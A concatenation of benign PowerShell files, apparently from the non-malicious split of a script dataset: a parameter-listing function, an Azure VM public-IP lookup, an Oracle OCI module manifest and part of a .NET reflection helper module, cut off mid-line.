ZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB # AOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az # /1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V2 # 9YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oa # ezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkN # yjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7K # MtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRf # NN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SU # HDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoY # WmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5 # C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8 # FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TAS # BgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1 # Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUw # UzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNy # b3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoG # CCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIB # hjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fO # mhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9w # a2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggr # BgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNv # bS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3 # DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEz # tTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJW # AAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G # 82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/Aye # ixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI9 # 5ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1j # dEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZ # KCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xB # Zj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuP # Ntq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvp # e784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCA1Aw # ggI4AgEBMIH5oYHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScw # JQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNVBAMT # HE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoBATAHBgUrDgMCGgMVAInb # HtxB+OlGyQnxQYhy04KSYSSPoIGDMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwDQYJKoZIhvcNAQELBQACBQDpdwuXMCIYDzIwMjQwMjE0MDk1MTE5 # WhgPMjAyNDAyMTUwOTUxMTlaMHcwPQYKKwYBBAGEWQoEATEvMC0wCgIFAOl3C5cC # AQAwCgIBAAICAbgCAf8wBwIBAAICFGEwCgIFAOl4XRcCAQAwNgYKKwYBBAGEWQoE # AjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAwehIKEKMAgCAQACAwGGoDANBgkq # hkiG9w0BAQsFAAOCAQEAD3oj3Gr5HTA5vQkFXZE9QSfCqxmL4ez3qxPD1t/UMJ9w # 93APM6n5MjApe6tpBjo4Oe83WMnfsWNA5ZRu8B/XJhyJ8531k5XMROCaVX6eTOrO # 70mkxtszD1E2m5iFx2RYJKS2ldkFAnykkFMc4ezXHa+RAijQA3rQp2VNidnVEFkO # jkaZY2FoA2dbG7v9ZjkQsmrycREGNiakPhAgqqmTiUlDPvul5gJx24VGL0z7JZhP # KUsccmv6HF3sgD6FjhENyZtD1+NrRfVQHTrjitjpC/dX9ux2OP8pjPi3WIdPfEsI # 2PhWNWSEof4cWFv/lLlYAUVeHPDcafr+2umlLYb62zGCBA0wggQJAgEBMIGTMHwx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p # Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB6pokctVZP2FjAAEAAAHq # MA0GCWCGSAFlAwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQw # LwYJKoZIhvcNAQkEMSIEIOxrWAXQ3exy2vtm7r5sbwdDZCTv0iYp8R2rTiWGeDCN # MIH6BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCBvQQgKY+h1eNkNHiLCDSW0sA1cGHk # bW4qooi+ryyMp6S4ZngwgZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0Eg # MjAxMAITMwAAAeqaJHLVWT9hYwABAAAB6jAiBCB7j2iMmFJTNAbY6vZ80pGTL0BC # A2VAW00KF9MbtVlx1zANBgkqhkiG9w0BAQsFAASCAgCkdmiv4L2p24umX5U2DAcU # jJsnnkgbSP7FreJHApiy6PzRl4/ivHnd8RFvQZf0k8WcO9ejUnAlIqrqghj6oSn8 # bev7qkyYntoOkZvttvUI2dJaSvH2FCZ+oCmMVzztrSw2IaXmrKa6QMacOpb3AMuS # luMgsCtuvbhEKhBY1yecxwGs2K2jI77nD63GvgKoPUMFiqBJ5SMu/J8re51QTSEQ # LmrhGeUlidh5NQ5kWNImQrOfVwa2ff7toLkqdSzkPAl6o2X6R0wkEd13tn9lIssC # M9iV1QtqsTGa8uZOFA6k9HZD8mjq5JB5fPPUAT27LewZUAjxTx5HSTvZkDUskICI # 0s3AGUw4+V3gMPvC7Mb8ZziNTPbnn//E3nlYSqjC9DzBCetgTs1aIajlBXDYI2eI # qOGlK/PdJ0JzmnXuMSAvmvGWoLJrFq7eEjKmt/uvmR0G0S5ZnkPum+sRxyfVPSly # cL+AE8R8g5t8D39qDu5KRZnyh7272VngUYJsrNI19OLhNgY5OXn6zGgQ3KbVTeLT # VDMLpT6xrDEbKvr6MAUVFdGXZX11Bi86h/hdOtBztXY01AOLzw/qJ4TvP9HDGAz/ # QrZx0pKRPy2Ui7FJigihGdj1tMzFFSaFuT/LFnBW9zSdmYh8E3qIXdEWsuES/TvB # iLYOK1VG4nvsd2vxaVkaXQ== # SIG # End signature block
combined_dataset/train/non-malicious/Get-Parameter_16.ps1
Get-Parameter_16.ps1
function Get-Parameter { [OutputType('System.String')] [CmdletBinding()] param( [Parameter(Mandatory=$true,Position=0,ValueFromPipeline=$true)] [ValidateNotNullOrEmpty()] [String]$Command, [Parameter(Position=1)] [String[]]$Name=@('*'), [Parameter()] [ValidateSet('Name','Type','Pos','BV','BP','DV','Aliases','Mandatory','Dynamic')] [String]$SortBy='Name', [Parameter()] [switch]$Descending, [Parameter()] [ValidateSet('Cmdlet','Function','Alias','ExternalScript')] [String]$CommandType, [switch]$IncludeCommonParameters ) Process { if($CommandType) { switch($CommandType) { "function" { $cmd = Get-Command -Name $Command -CommandType $CommandType -ErrorAction SilentlyContinue | Where-Object {$_.CommandType -eq $CommandType} } "filter" { $cmd = Get-Command -Name $Command -CommandType $CommandType -ErrorAction SilentlyContinue | Where-Object {$_.CommandType -eq $CommandType} } default { $cmd = Get-Command -Name $Command -CommandType $CommandType -ErrorAction SilentlyContinue } } } else { $cmd = Get-Command -Name $Command -CommandType Cmdlet,Function,Alias,ExternalScript -ErrorAction SilentlyContinue } if(!$cmd) { Throw "'$Name' is not a Cmdlet,Function,Filter,Alias or ExternalScript" } if($cmd.length -gt 1) { $types = $cmd | Select-Object -ExpandProperty CommandType -Unique Throw "'$Command' is ambiguous and matches one of $($types -join ","). Use -CommandType to get only a specified type of command." } if($cmd.CommandType -eq 'Alias') { Write-Verbose "'$Name' refers to an Alias, reolving command." $cmd = Get-Command -Name $cmd.ResolvedCommandName } foreach($set in $cmd.ParameterSets) { if($IncludeCommonParameters) { $p = $set.Parameters | Select-Object * } else { # Get a list of common parameters $cp = [System.Management.Automation.Internal.CommonParameters].GetProperties() | Select-Object -ExpandProperty Name $p = $set.Parameters | Where-Object {$cp -notcontains $_.Name} | Select-Object * } $params = $p | Foreach-Object {$_.Name} if($params.count -le 0 -and !$IncludeCommonParameters) { Throw "The specified cmdlet ('$cmd') has no parameters." } for($i=0;$i -le $p.length;$i++) { $flag=$false for($x=0;$x -le $params[$i].length -and !($flag);$x++) { $regex = "^" + $params[$i].substring(0,$x) if(($params -match $regex).count -eq 1) { $flag=$true $p[$i].Aliases += $regex.substring(1).ToLower() } } } $p | Where-Object {$_.Name -like $Name} | Foreach-Object { $PropertyName = $_.Name $psn = $_.Attributes | Where-Object {$_.ParameterSetName} if($psn.ParameterSetName -notmatch '__AllParameterSets') { $PropertyName="*$PropertyName" } New-Object PSObject -Property @{ ParameterSet = $set.Name Name = $PropertyName BV = $_.ValueFromPipeline BP = $_.ValueFromPipelineByPropertyName Type = $_.ParameterType.Name Aliases = $_.Aliases Pos = if($_.Position -lt 0) {'Named'} else {$_.Position+1} Mandatory = $_.IsMandatory Dynamic = $_.IsDynamic } } | Sort-Object -Descending:$Descending {$_.$SortBy -replace '\\*'} | Format-Table Name,Type,Pos,BV,BP,Aliases,Mandatory,Dynamic -AutoSize -GroupBy ParameterSet | Out-String } } } Set-Alias -Name gprm -Value Get-Parameter
combined_dataset/train/non-malicious/3207.ps1
3207.ps1
Function Get-AzureRmVmPublicIP { [cmdletbinding()] param( [string[]]$ResourceGroupName, [string[]]$VMName, [switch]$IncludeObjects, [switch]$VMStatus ) foreach($ResourceGroup in $ResourceGroupName) { Try { $AllVMs = @( Get-AzureRMVm -ResourceGroupName $ResourceGroup -ErrorAction Stop ) } Catch { Write-Error $_ Write-Error "Could not extract VMs from resource group '$ResourceGroup'" continue } Try { $NICS = @( Get-AzureRmNetworkInterface -ResourceGroupName $ResourceGroup -ErrorAction Stop ) } Catch { Write-Error $_ Write-Error "Could not extract network interfaces from resource group '$ResourceGroup'" continue } Try { $PublicIPS = @( Get-AzureRmPublicIpAddress -ResourceGroupName $ResourceGroup -ErrorAction Stop) } Catch { Write-Error $_ Write-Error "Could not extract public IPs from resource group '$ResourceGroup'" continue } $TheseVMs = foreach($VM in $AllVMs) { if($VMName) { foreach($Name in $VMName) { if($VM.Name -like $Name) { $VM } } } else { $VM } } $TheseVMs = @( $TheseVMs | Sort Name -Unique ) Foreach($nic in $nics) { $VMs = $null $VMs = $TheseVMs.Where({$_.Id -eq $nic.virtualmachine.id}) $PIPS = $null $PIPS = $PublicIPS.Where({$_.Id -eq $nic.IpConfigurations.publicipaddress.id}) foreach($VM in $VMs) { if($VMStatus) { Try { $VMDetail = Get-AzureRMVm -ResourceGroupName $ResourceGroup -Status -Name $VM.Name -ErrorAction stop } Catch { Write-Error $_ Write-Error "Could not extract '-Status' details from $($VM.Name) in resource group $ResourceGroup. Falling back to non detailed" $VMDetail = $VM } if(-not $IncludeObjects) { $IncludeObjects = $True } } else { $VMDetail = $VM } foreach($PIP in $PIPS) { $Output = [ordered]@{ ResourceGroupName = $ResourceGroup VMName = $VM.Name NICName = $nic.Name PublicIP = $PIP.IpAddress } if($IncludeObjects) { $Output.Add('VM', $VMDetail) $Output.Add('NIC', $NIC) $Output.Add('PIP', $PIP) } [pscustomobject]$Output } } } } }
combined_dataset/train/non-malicious/sample_37_53.ps1
sample_37_53.ps1
# # Module manifest for module 'OCI.PSModules.Psql' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Psql.dll' # Version number of this module. ModuleVersion = '81.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '4e5ce5bb-7b1e-43a9-bd4b-3697eb32c070' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Psql Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Psql.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIPsqlBackup', 'Get-OCIPsqlBackupsList', 'Get-OCIPsqlConfiguration', 'Get-OCIPsqlConfigurationsList', 'Get-OCIPsqlConnectionDetails', 'Get-OCIPsqlDbSystem', 'Get-OCIPsqlDbSystemsList', 'Get-OCIPsqlDefaultConfiguration', 'Get-OCIPsqlDefaultConfigurationsList', 'Get-OCIPsqlPrimaryDbInstance', 'Get-OCIPsqlShapesList', 'Get-OCIPsqlWorkRequest', 'Get-OCIPsqlWorkRequestErrorsList', 'Get-OCIPsqlWorkRequestLogsList', 'Get-OCIPsqlWorkRequestsList', 'Invoke-OCIPsqlFailoverDbSystem', 'Invoke-OCIPsqlPatchDbSystem', 'Move-OCIPsqlBackupCompartment', 'Move-OCIPsqlConfigurationCompartment', 'Move-OCIPsqlDbSystemCompartment', 'New-OCIPsqlBackup', 'New-OCIPsqlConfiguration', 'New-OCIPsqlDbSystem', 'Remove-OCIPsqlBackup', 'Remove-OCIPsqlConfiguration', 'Remove-OCIPsqlDbSystem', 'Reset-OCIPsqlMasterUserPassword', 'Restart-OCIPsqlDbInstanceInDbSystem', 'Restore-OCIPsqlDbSystem', 'Update-OCIPsqlBackup', 'Update-OCIPsqlConfiguration', 'Update-OCIPsqlDbSystem', 'Update-OCIPsqlDbSystemDbInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Psql' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Reflection Module 4.0.ps1
Reflection Module 4.0.ps1
#requires -version 2.0 # ALSO REQUIRES Autoload for some functionality # You should create a Reflection.psd1 with the contents: @{ RequiredModules = @("Autoload"); GUID="64b5f609-970f-4e65-b02f-93ccf3e60cbb"; ModuleVersion="3.5.0.0" } #History: # 1.0 - First public release (March 19, 2010) # 2.0 - Private Build # - Included the Accelerator function inline # - Added a few default aliases # 3.0 - September 3, 2010 # - Included the New-ConstructorFunction feature (ripped from PowerBoots to serve a more generic and powerful purpose!) # - New-ConstructorFunction and Import-ConstructorFunctions depend on the Autoload Module: http://poshcode.org/2312 # 3.5 - January 28, 2011 # - Fixed several bugs in Add-Assembly, Get-Assembly, Get-MemberSignature # - Fixed alias exporting so aliases will show up now # - Added New-ModuleManifestFromSnapin to create module manifests from snapin assemblies # 3.6 - January 28, 2011 # - Added *basic* support for CustomPSSnapin to New-ModuleManifestFromSnapin # 3.7 - February 1, 2001 - NOT RELEASED # - Added [TransformAttribute] type # 3.8 - May 4, 2011 - NOT RELEASED # - Huge rewrite of Invoke-Generic (also published separately: http://poshcode.org/2649) # 3.9 - May 25, 2011 - NOT RELEASED # - Added "Interface" parameter to Get-Type # 4.0 - Sept 27, 2011 # - Fix conflicts with PowerShell 3 Add-Type -TypeDefinition @" using System; using System.ComponentModel; using System.Management.Automation; using System.Collections.ObjectModel; [AttributeUsage(AttributeTargets.Field | AttributeTargets.Property)] public class TransformAttribute : ArgumentTransformationAttribute { private ScriptBlock _scriptblock; private string _noOutputMessage = "Transform Script had no output."; public override string ToString() { return string.Format("[Transform(Script='{{{0}}}')]", Script); } public override Object Transform( EngineIntrinsics engine, Object inputData) { try { Collection<PSObject> output = engine.InvokeCommand.InvokeScript( engine.SessionState, Script, inputData ); if(output.Count > 1) { Object[] transformed = new Object[output.Count]; for(int i =0; i < output.Count;i++) { transformed[i] = output[i].BaseObject; } return transformed; } else if(output.Count == 1) { return output[0].BaseObject; } else { throw new ArgumentTransformationMetadataException(NoOutputMessage); } } catch (ArgumentTransformationMetadataException) { throw; } catch (Exception e) { throw new ArgumentTransformationMetadataException(string.Format("Transform Script threw an exception ('{0}'). See `$Error[0].Exception.InnerException.InnerException for more details.",e.Message), e); } } public TransformAttribute() { this.Script = ScriptBlock.Create("{`$args}"); } public TransformAttribute( ScriptBlock Script ) { this.Script = Script; } public ScriptBlock Script { get { return _scriptblock; } set { _scriptblock = value; } } public string NoOutputMessage { get { return _noOutputMessage; } set { _noOutputMessage = value; } } } "@ function Get-Type { <# .Synopsis Gets the types that are currenty loaded in .NET, or gets information about a specific type .Description Gets information about one or more loaded types, or gets the possible values for an enumerated type or value. .Parameter Assembly The Assemblies to search for types. Can be an actual Assembly object or a regex to pass to Get-Assembly. .Parameter TypeName The type name(s) to search for (wildcard patterns allowed). .Parameter BaseType A Base type they should derive from (wildcard patterns allowed). .Parameter Interface An interface they should implement (wildcard patterns allowed). .Parameter Enum An enumeration to list all of enumeration values for .Parameter Namespace A namespace to restrict where we selsect types from (wildcard patterns allowed). .Parameter Force Causes Private types to be included .Example Get-Type Gets all loaded types (takes a VERY long time to print out) .Example Get-Type -Assembly ([PSObject].Assembly) Gets types from System.Management.Automation .Example [Threading.Thread]::CurrentThread.ApartmentState | Get-Type Gets all of the possible values for the ApartmentState property .Example [Threading.ApartmentState] | Get-Type Gets all of the possible values for an apartmentstate #> [CmdletBinding(DefaultParameterSetName="Assembly")] param( # The assembly to collect types from [Parameter(ValueFromPipeline=$true)] [PsObject[]]$Assembly , # The type names to return from [Parameter(Mandatory=$false,Position=0)] [String[]]$TypeName , # The type names to return from [Parameter(Mandatory=$false)] [String[]]$Namespace , # A Base Type they should derive from [Parameter(Mandatory=$false)] [String[]]$BaseType , # An Interface they should implement [Parameter(Mandatory=$false)] [String[]]$Interface , # The enumerated value to get all of the possibilties of [Parameter(ParameterSetName="Enum")] [PSObject]$Enum , [Parameter()][Alias("Private","ShowPrivate")] [Switch]$Force ) process { if($psCmdlet.ParameterSetName -eq 'Enum') { if($Enum -is [Enum]) { [Enum]::GetValues($enum.GetType()) } elseif($Enum -is [Type] -and $Enum.IsEnum) { [Enum]::GetValues($enum) } else { throw "Specified Enum is neither an enum value nor an enumerable type" } } else { if($Assembly -as [Reflection.Assembly[]]) { ## This is what we expected, move along } elseif($Assembly -as [String[]]) { $Assembly = Get-Assembly $Assembly } elseif(!$Assembly) { $Assembly = [AppDomain]::CurrentDomain.GetAssemblies() } :asm foreach ($asm in $assembly) { Write-Verbose "Testing Types from Assembly: $($asm.Location)" if ($asm) { trap { if( $_.Exception.LoaderExceptions[0] -is [System.IO.FileNotFoundException] ) { $PSCmdlet.WriteWarning( "Unable to load some types from $($asm.Location), required assemblies were not found. Use -Debug to see more detail") continue asm } Write-Error "Unable to load some types from $($asm.Location). Try with -Debug to see more detail" Write-Debug $( $_.Exception.LoaderExceptions | Out-String ) continue asm } $asm.GetTypes() | Where { ( $Force -or $_.IsPublic ) -AND ( !$Namespace -or $( foreach($n in $Namespace) { $_.Namespace -like $n } ) ) -AND ( !$TypeName -or $( foreach($n in $TypeName) { $_.Name -like $n -or $_.FullName -like $n } ) -contains $True ) -AND ( !$BaseType -or $( foreach($n in $BaseType) { $_.BaseType -like $n } ) -contains $True ) -AND ( !$Interface -or @( foreach($n in $Interface) { $_.GetInterfaces() -like $n } ).Count -gt 0 ) } } } } } } function Add-Assembly { #.Synopsis # Load assemblies #.Description # Load assemblies from a folder #.Parameter Path # Specifies a path to one or more locations. Wildcards are permitted. The default location is the current directory (.). #.Parameter Passthru # Returns System.Runtime objects that represent the types that were added. By default, this cmdlet does not generate any output. # Aliased to -Types #.Parameter Recurse # Gets the items in the specified locations and in all child items of the locations. # # Recurse works only when the path points to a container that has child items, such as C:\\Windows or C:\\Windows\\*, and not when it points to items that do not have child items, such as C:\\Windows\\*.dll [CmdletBinding()] param( [Parameter(ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true, Position=0)] [Alias("PSPath")] [string[]]$Path = "." , [Alias("Types")] [Switch]$Passthru , [Switch]$Recurse ) process { foreach($file in Get-ChildItem $Path -Filter *.dll -Recurse:$Recurse) { Add-Type -Path $file.FullName -Passthru:$Passthru | Where { $_.IsPublic } } } } function Get-Assembly { <# .Synopsis Get a list of assemblies available in the runspace .Description Returns AssemblyInfo for all the assemblies available in the current AppDomain, optionally filtered by partial name match .Parameter Name A regex to filter the returned assemblies. This is matched against the .FullName or Location (path) of the assembly. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$true, Position=0)] [string[]]$Name = '' ) process { [appdomain]::CurrentDomain.GetAssemblies() | Where { $Assembly = $_ if($Name){ $( foreach($n in $Name){ if(Resolve-Path $n -ErrorAction 0) { $n = [Regex]::Escape( (Resolve-Path $n).Path ) } $Assembly.FullName -match $n -or $Assembly.Location -match $n -or ($Assembly.Location -and (Split-Path $Assembly.Location) -match $n) } ) -contains $True } else { $true } } } } function Update-PSBoundParameters { #.Synopsis # Ensure a parameter value is set #.Description # Update-PSBoundParameters takes the name of a parameter, a default value, and optionally a min and max value, and ensures that PSBoundParameters has a value for it. #.Parameter Name # The name (key) of the parameter you want to set in PSBoundParameters #.Parameter Default # A Default value for the parameter, in case it's not already set #.Parameter Min # The Minimum allowed value for the parameter #.Parameter Max # The Maximum allowed value for the parameter #.Parameter PSBoundParameters # The PSBoundParameters you want to affect (this picks the local PSBoundParameters object, so you shouldn't have to set it) Param( [Parameter(Mandatory=$true, Position=0)] [String]$Name , [Parameter(Mandatory=$false, Position=1)] $Default , [Parameter()] $Min , [Parameter()] $Max , [Parameter(Mandatory=$true, Position=99)] $PSBoundParameters=$PSBoundParameters ) end { $outBuffer = $null ## If it's not set, and you passed a default, we set it to the default if($Default) { if (!$PSBoundParameters.TryGetValue($Name, [ref]$outBuffer)) { $PSBoundParameters[$Name] = $Default } } ## If you passed a $max, and it's set greater than $max, we set it to $max if($Max) { if ($PSBoundParameters.TryGetValue($Name, [ref]$outBuffer) -and $outBuffer -gt $Max) { $PSBoundParameters[$Name] = $Max } } ## If you passed a $min, and it's set less than $min, we set it to $min if($Min) { if ($PSBoundParameters.TryGetValue($Name, [ref]$outBuffer) -and $outBuffer -lt $Min) { $PSBoundParameters[$Name] = $Min } } $PSBoundParameters } } function Get-Constructor { <# .Synopsis Returns RuntimeConstructorInfo for the (public) constructor methods of the specified Type. .Description Get the RuntimeConstructorInfo for a type and add members "Syntax," "SimpleSyntax," and "Definition" to each one containing the syntax information that can use to call that constructor. .Parameter Type The type to get the constructor for .Parameter Force Force inclusion of Private and Static constructors which are hidden by default. .Parameter NoWarn Serves as the replacement for the broken -WarningAction. If specified, no warnings will be written for types without public constructors. .Example Get-Constructor System.IO.FileInfo Description ----------- Gets all the information about the single constructor for a FileInfo object. .Example Get-Type System.IO.*info mscorlib | Get-Constructor -NoWarn | Select Syntax Description ----------- Displays the constructor syntax for all of the *Info objects in the System.IO namespace. Using -NoWarn supresses the warning about System.IO.FileSystemInfo not having constructors. .Example $path = $pwd $driveName = $pwd.Drive $fileName = "$Profile" Get-Type System.IO.*info mscorlib | Get-Constructor -NoWarn | ForEach-Object { Invoke-Expression $_.Syntax } Description ----------- Finds and invokes the constructors for DirectoryInfo, DriveInfo, and FileInfo. Note that we pre-set the parameters for the constructors, otherwise they would fail with null arguments, so this example isn't really very practical. #> [CmdletBinding()] param( [Parameter(Mandatory=$true, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$true, Position=0)] [Alias("ParameterType")] [Type]$Type , [Switch]$Force , [Switch]$NoWarn ) process { $type.GetConstructors() | Where-Object { $Force -or $_.IsPublic -and -not $_.IsStatic } -OutVariable ctor | Select *, @{ name = "TypeName"; expression = { $_.ReflectedType.FullName } }, @{ name = "Definition"; expression = {Get-MemberSignature $_ -Simple} }, @{ name = "Syntax"; expression = {Get-MemberSignature $_ -Simple} }, @{ name = "SafeSyntax"; expression = {Get-MemberSignature $_} } if(!$ctor -and !$NoWarn) { Write-Warning "There are no public constructors for $($type.FullName)" } } } function Get-Method { <# .Synopsis Returns MethodInfo for the (public) methods of the specified Type. .Description Get the MethodInfo for a type and add members "Syntax," "SimpleSyntax," and "Definition" to each one containing the syntax information that can use to call that method. .Parameter Type The type to get methods on .Parameter Name The name(s) of the method(s) you want to retrieve (Accepts Wildcard Patterns) .Parameter Force Force inclusion of Private methods and property accessors which are hidden by default. #> [CmdletBinding(DefaultParameterSetName="Type")] param( [Parameter(ParameterSetName="Type", Mandatory=$true, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$true, Position=0)] [Type]$Type , [Parameter(Mandatory=$false, ValueFromPipelineByPropertyName=$true, Position=1)] [String[]]$Name ="*" , [Switch]$Definition , [Switch]$Force ) process { foreach($method in $type.GetMethods() + $type.GetConstructors() | Where-Object { $Force -or $_.IsPublic } | # Hide the Property accessor methods Where-Object { $Force -or !$_.IsSpecialName -or $_.Name -notmatch 